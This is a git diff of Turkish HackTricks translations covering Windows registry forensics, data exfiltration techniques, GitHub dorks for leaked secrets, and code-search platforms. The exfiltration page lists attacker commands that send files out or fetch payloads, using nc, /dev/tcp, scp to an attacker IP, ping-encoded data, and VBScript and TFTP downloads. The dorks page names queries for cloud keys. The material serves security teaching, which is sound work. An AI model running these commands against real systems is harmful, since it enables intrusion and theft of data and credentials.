* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
{% endhint %}
### **Windows Sürümü ve Sahip Bilgileri**
- **`Software\Microsoft\Windows NT\CurrentVersion`** altında, Windows sürümü, Service Pack'i, kurulum zamanını ve kayıtlı sahibin adınıık bir şekilde bulabilirsiniz.
- **`Software\Microsoft\Windows NT\CurrentVersion`** altında, Windows sürümü, Service Pack, kurulum zamanı ve kayıtlı sahibin adınıık bir şekilde bulabilirsiniz.
### **Bilgisayar Adı**
- Ana bilgisayar adı **`System\ControlSet001\Control\ComputerName\ComputerName`** altında bulunur.
@ -31,13 +31,13 @@ HackTricks'ı desteklemenin diğer yolları:
`fsutil behavior set disablelastaccess 0`
### Windows Sürümleri ve Service Pack'ler
- **Windows sürümü**, sürümü (örneğin, Ev, Pro) ve çıkışı (örneğin, Windows 10, Windows 11) belirtirken, **Service Pack'ler** düzeltmeleri ve bazen yeni özellikleri içeren güncellemelerdir.
- **Windows sürümü**, sürümü (örneğin, Ev, Pro) ve sürümünü (örneğin, Windows 10, Windows 11) gösterirken, **Service Pack'ler** düzeltmeleri ve bazen yeni özellikleri içeren güncellemelerdir.
### Son Erişim Zamanını Etkinleştirme
- Son erişim zamanı takibini etkinleştirmek, dosyaların ne zaman en son açıldığını görmeyi sağlar, bu da adli analiz veya sistem izleme için önemli olabilir.
### Ağ Bilgisi Detayları
- Kayıt defteri, ağ yapılandırmaları hakkında kapsamlı verileri içerir, **ağ türleri (kablosuz, kablolu, 3G)** ve **ağ kategorileri (Genel, Özel/Ev, Etki Alanı/İş)** gibi, ağ güvenlik ayarlarını ve izinleri anlamak için hayati önem taşır.
### Ağ Bilgileri Detayları
- Kayıt defteri, ağ yapılandırmaları hakkında kapsamlı verileri içerir, **ağ türleri (kablosuz, kablo, 3G)** ve **ağ kategorileri (Genel, Özel/Ev, Etki Alanı/İş)** gibi, ağ güvenlik ayarlarını ve izinleri anlamak için hayati önem taşır.
### İstemci Tarafı Önbelleği (CSC)
- **CSC**, paylaşılan dosyaların kopyalarını önbelleğe alarak çevrimdışı dosya erişimini geliştirir. Farklı **CSCFlags** ayarları, hangi dosyaların ve nasıl önbelleğe alındığını kontrol eder, özellikle aralıklı bağlantıların olduğu ortamlarda performansı ve kullanıcı deneyimini etkiler.
@ -46,13 +46,13 @@ HackTricks'ı desteklemenin diğer yolları:
- Başlangıçta otomatik olarak başlatılan programlar, sistem başlatma süresini etkiler ve kötü amaçlı yazılımları veya istenmeyen yazılımları tanımlamak için ilgi noktaları olabilir, çeşitli `Run` ve `RunOnce` kayıt defteri anahtarlarında listelenirler.
### Shellbags
- **Shellbags**, sadece klasör görünümleri için tercihleri depolamakla kalmaz, aynı zamanda klasörün artık var olmasa bile erişildiğine dair adli kanıtlar sağlar. Diğer yöntemlerle açık olmayan kullanıcı etkinliğini ortaya çıkarmak için değerlidir.
- **Shellbags**, sadece klasör görünümleri için tercihleri depolamakla kalmaz, aynı zamanda klasör artık mevcut olmasa bile klasör erişimine dair adli kanıtlar sağlar. Diğer yöntemlerle açık olmayan kullanıcı etkinliğini ortaya çıkarmak için değerlidir.
### USB Bilgileri ve Adli Bilişim
- USB cihazları hakkında kayıt defterinde saklanan ayrıntılar, bir bilgisayara bağlanan cihazları izlemeye yardımcı olabilir, potansiyel olarak bir cihazı hassas dosya transferleri veya izinsiz erişim olaylarıyla ilişkilendirebilir.
### Hacim Seri Numarası
- **Hacim Seri Numarası**, dosya sisteminin belirli bir örneğini izlemek için önemli olabilir, dosya kökeninin farklı cihazlar arasında belirlenmesi gereken adli senaryolarda kullanışlıdır.
### Birim Seri Numarası
- **Birim Seri Numarası**, farklı cihazlar arasında dosya kaynağının belirlenmesi gereken adli senaryolarda faydalı olan dosya sisteminin belirli bir örneğini izlemek için önemli olabilir.
### **Kapanma Ayrıntıları**
- Kapanma zamanı ve sayısı (yalnızca XP için) **`System\ControlSet001\Control\Windows`** ve **`System\ControlSet001\Control\Watchdog\Display`** içinde saklanır.
@ -68,23 +68,38 @@ HackTricks'ı desteklemenin diğer yolları:
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** gibi yollar ve başlangıçta çalışacak programları ayrıntılandıran `Software\Microsoft\Windows\CurrentVersion` altındaki benzer girişler.
### **Aramalar ve Yazılan Yollar**
- Araştırıcı aramaları ve yazılan yollar, WordwheelQuery ve TypedPaths için **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** altında kaydedilir.
- Araştırıcı aramaları ve yazılan yollar, WordwheelQuery ve TypedPaths için sırasıyla **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** altında kaydedilir.
### **Son Belgeler ve Office Dosyaları**
- Erişilen son belgeler ve Office dosyaları, `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` ve belirli Office sürümü yollarında belirtilir.
### **Son Belgeler ve Ofis Dosyaları**
- Erişilen son belgeler ve Ofis dosyaları, `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` ve belirli Ofis sürümü yollarında belirtilir.
### **En Son Kullanılan (MRU) Öğeler**
- En son dosya yollarını ve komutları gösteren MRU listeleri, `NTUSER.DAT` altındaki çeşitli `ComDlg32` ve `Explorer` alt anahtarlarında saklanır.
- Son dosya yollarını ve komutları gösteren MRU listeleri, `NTUSER.DAT` altındaki çeşitli `ComDlg32` ve `Explorer` alt anahtarlarında saklanır.
### **Kullanıcı Etkinlik Takibi**
- Kullanıcı Yardımı özelliği, uygulama kullanım istatistiklerini ayrıntılı olarak kaydeder, çalıştırma sayısını ve son çalıştırma zamanını **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`** altında.
- Kullanıcı Yardımı özelliği, ayrıntılı uygulama kullanım istatistiklerini, çalıştırma sayısını ve son çalıştırma zamanını **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`** altında kaydeder.
### **Shellbags Analizi**
- Klasör erişim ayrıntılarını ortaya çıkaran Shellbags, `USRCLASS.DAT` ve `NTUSER.DAT` altında `Software\Microsoft\Windows\Shell` içinde saklanır. Analiz için **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** kullanın.
- Klasör erişim ayrıntılarını ortaya çıkaran Shellbags, analiz için `USRCLASS.DAT` ve `NTUSER.DAT` altında `Software\Microsoft\Windows\Shell`'de saklanır. Analiz için **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** kullanın.
### **USB Cihaz Geçmişi**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** ve **`HKLM\SYSTEM\ControlSet001\Enum\USB`** bağlı USB cihazları hakkında zengin ayrıntılar içerir, üretici, ürün adı ve bağlantı zaman damgaları gibi.
- Belirli bir USB cihazıyla ilişkilendirilen kullanıcıyı belirlemek için `NTUSER.DAT` yuvalarında cihazın **{GUID}**'sini arayabilirsiniz.
- Son bağlanan cihaz ve hacim seri numarası, sırasıyla `System\MountedDevices` ve `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` içinde izlenebilir.
- Belirli bir USB cihazıyla ilişkilendirilen kullanıcı, cihazın **{GUID}**'sini arayarak `NTUSER.DAT` hive'larında belirlenebilir.
- Son bağlanan cihaz ve birim seri numarası, sırasıyla `System\MountedDevices` ve `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` altında izlenebilir.
Bu kılavuz, Windows sistemlerinde ayrıntılı sistem, ağ ve kullanıcı etkinlik bilgilerine erişmek için önemli yolları ve yöntemleri özlü ve kullanılabilir bir şekilde sunar.
Bu kılavuz, Windows sistemlerinde detaylı sistem, ağ ve kullanıcı etkinlik bilgilerine erişmek için önemli yolları ve yöntemleri özlü ve kullanışlı bir şekilde özetlemektedir.
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekleyin</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# Veri Çıkarma
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**Try Hard Security Group**
**Try Hard Güvenlik Grubu**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -24,7 +25,7 @@ HackTricks'ı desteklemenin diğer yolları:
## Bilgi çıkarmak için genellikle izin verilen alan adları
[https://lots-project.com/](https://lots-project.com/) adresini kontrol ederek kötüye kullanılabilecek genellikle izin verilen alan adlarını bulun
Kötüye kullanılabilen genellikle izin verilen alan adlarını bulmak için [https://lots-project.com/](https://lots-project.com/) adresini kontrol edin
## Base64 Kopyala ve Yapıştır
@ -193,14 +194,14 @@ Windows
Exfiltration is the unauthorized transfer of data from a target system. There are various methods to exfiltrate data from a compromised system, including:
1. **Email**: Sending data as email attachments to an external email address.
2. **FTP**: Transferring data using the File Transfer Protocol to a remote server.
3. **DNS**: Encoding data within DNS requests to leak information.
4. **HTTP/HTTPS**: Sending data over HTTP or HTTPS to a remote server.
5. **Steganography**: Hiding data within images or other files to avoid detection.
6. **Cloud Storage**: Uploading data to cloud storage services like Dropbox or Google Drive.
- **Email**: Sending data as email attachments to an external email address.
- **FTP**: Transferring data using the File Transfer Protocol to an external server.
- **DNS**: Encoding data within DNS requests to leak information.
- **HTTP/HTTPS**: Sending data over HTTP or HTTPS to a remote server.
- **Steganography**: Hiding data within other files to avoid detection.
- **Cloud Storage**: Uploading data to cloud storage services for retrieval later.
Exfiltration can be a critical phase in a cyber attack, as it allows threat actors to steal sensitive information from a target organization. It is essential for organizations to implement strong security measures to prevent data exfiltration and protect their valuable assets.
It is essential for attackers to exfiltrate data stealthily to avoid detection by security measures.
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
@ -216,7 +217,7 @@ scp <username>@<Attacker_IP>:<directory>/<filename>
```
## SSHFS
Eğer kurbanın SSH'si varsa, saldırgan kurbandan saldırganın bilgisayarına bir dizin bağlayabilir.
Eğer kurbanın SSH'si varsa, saldırgan kurbandan saldırgana bir dizin bağlayabilir.
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
@ -224,14 +225,14 @@ sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP addre
```
## NC
NC, or Netcat, is a versatile networking tool that can be used for exfiltration. It can create connections to remote systems, listen for incoming connections, and transfer data between systems. NC can be used to exfiltrate data over various protocols such as TCP or UDP. It is a powerful tool for both red teaming and penetration testing engagements.
NC, or Netcat, is a versatile networking tool that can be used for various purposes during a penetration test. It can be used for port scanning, banner grabbing, transferring files, and even creating reverse shells. Netcat can also be used for exfiltration by sending data over the network to an attacker-controlled machine.
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
## /dev/tcp
### Kurbanın cihazından dosya indirin
### Kurbanın cihazından dosya indir
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
@ -243,11 +244,9 @@ nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt
```
## **ICMP**
Teşekkürler **@BinaryShadow\_**
## **ICMP**
ICMP, Internet Control Message Protocol, is a network layer protocol used to send error messages and operational information indicating success or failure when communicating with a host. ICMP can also be used for exfiltration purposes due to its low detection rate and ability to bypass firewalls.
```bash
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
@ -287,13 +286,13 @@ cp /path/tp/nc.exe /tftp
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
```
**kurban** üzerinde, Kali sunucusuna bağlanın:
**victim** üzerinde, Kali sunucusuna bağlanın:
```bash
tftp -i <KALI-IP> get nc.exe
```
## PHP
PHP ile bir dosyayı indirin:
PHP'de bir oneliner ile bir dosya indirin:
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
@ -301,7 +300,7 @@ echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', '
### VBScript Exfiltration
VBScript can be used to exfiltrate data from a compromised system. This can be achieved by encoding the data and sending it to an external server controlled by the attacker. VBScript can also be used to compress the data before exfiltration to minimize the amount of data sent over the network. This technique can help attackers avoid detection by security tools that monitor network traffic for suspicious patterns.
VBScript can be used to exfiltrate data from a compromised system. This can be achieved by reading files, accessing system information, or interacting with network resources. VBScript can then encode the data and send it to an external server using various techniques such as HTTP requests or DNS queries. This allows an attacker to steal sensitive information without being easily detected.
```bash
Attacker> python -m SimpleHTTPServer 80
```
@ -339,7 +338,7 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
`debug.exe` programı sadece ikili dosyaların incelenmesine izin vermekle kalmaz, aynı zamanda onları onaltılıktan yeniden oluşturma yeteneğine sahiptir. Bu, bir ikili dosyanın onaltılık bir gösterimini sağlayarak `debug.exe`nin ikili dosyayı oluşturabilmesi anlamına gelir. Bununla birlikte, debug.exe'nin **64 kb boyutundaki dosyaları birleştirme sınırlaması olduğunu** unutmamak önemlidir.
`debug.exe` programı sadece ikili dosyaların incelenmesine izin vermekle kalmaz, aynı zamanda onları onaltılıktan yeniden oluşturma yeteneğine de sahiptir. Bu, bir ikili dosyanın onaltılık bir gösterimini sağlayarak `debug.exe`nin ikili dosyayı oluşturabilmesi anlamına gelir. Bununla birlikte, debug.exe'nin **64 kb boyutundaki dosyaları birleştirme sınırlaması olduğunu** unutmamak önemlidir.
```bash
# Reduce the size
upx -9 nc.exe
@ -360,17 +359,18 @@ Ardından metni windows-shell'e kopyalayıp yapıştırın ve nc.exe adında bir
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
AWS Hacking öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmaya kadar AWS hackleme öğrenin!</summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}
```

View file

@ -1,27 +1,28 @@
# Github Dorks & Sızıntılar
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bounty ipucu**: **Hackerlar tarafından oluşturulan premium bir ödül avı platformu olan Intigriti'ye** kaydolun! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresinde bize katılın ve **$100,000**'e kadar ödüller kazanmaya başlayın!
**Ödül avcılığı ipucu**: **Intigriti'ye kaydolun**, hackerlar tarafından oluşturulan bir premium **ödül avcılığı platformu!** Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresinde bize katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
{% embed url="https://go.intigriti.com/hacktricks" %}
Şimdi kapsamımızın varlıklar listesini oluşturduğumuza göre, bazı OSINT düşük asma meyvelerini aramak için zamanı geldi.
Artık kapsamımızın varlıklar listesini oluşturduğumuza göre, OSINT'te kolay hedeflere bakma zamanı geldi.
### Sızıntıları arayan platformlar
### Zaten sızıntılar için arama yapan platformlar
* [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
@ -321,16 +322,17 @@ GCP SECRET
AWS SECRET
"private" extension:pgp
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# Geniş Kaynak Kodu Araması
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**Try Hard Güvenlik Grubu**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -22,36 +23,37 @@ HackTricks'ı desteklemenin diğer yolları:
***
Bu sayfanın amacı, bir veya daha fazla platformda binlerce/milyonlarca depoda kod (kelime veya regex) aramaya izin veren **platformları sıralamaktır**.
Bu sayfanın amacı, bir veya daha fazla platformda binlerce/milyonlarca depoda **kod aramaya izin veren platformları** sıralamaktır.
Bu, **sızdırılmış bilgileri aramak** veya **zafiyetlerin** desenlerini aramak için birkaç durumda yardımcı olur.
Bu, **sızdırılmış bilgileri** veya **zayıflıkların** desenlerini aramak için birkaç durumda yardımcı olur.
* [**SourceGraph**](https://sourcegraph.com/search): Milyonlarca depoda arama yapın. Ücretsiz bir sürümü ve kurumsal bir sürümü (15 günlük ücretsiz) bulunmaktadır. Regex'leri destekler.
